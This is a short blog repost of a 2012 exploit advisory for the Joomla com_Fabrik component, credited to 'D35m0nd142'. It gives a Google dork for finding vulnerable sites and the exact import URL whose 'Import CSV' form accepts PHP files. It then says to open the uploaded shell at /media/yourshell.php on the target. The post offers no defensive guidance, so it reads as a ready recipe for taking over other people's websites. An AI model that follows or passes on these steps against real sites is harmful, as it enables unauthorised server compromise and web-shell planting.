Sunday, March 6, 2016

Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

  1. $************************************************* *******************************$
  2. # +================================================= ================+
  3. # | Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability |
  4. # +================================================= ================+
  5. # Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
  6. # Date : 14/09/2012
  7. # Exploit Author : D35m0nd142
  8. # Vendor Homepage : http://fabrikar.com/
  9. # Tested on : Mozilla Firefox on Ubuntu 12.04
  10. $************************************************* *******************************$
  13. # Vulnerable path :
  15. index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
  16. --
  18. In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".
  19. --
  21. Screenshot of the uploading page --> http://imageshack.us/photo/my-images/269/comfabrik.png/
  22. --
  24. After uploaded shell go to --> http://[target]/media/yourshell.php
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)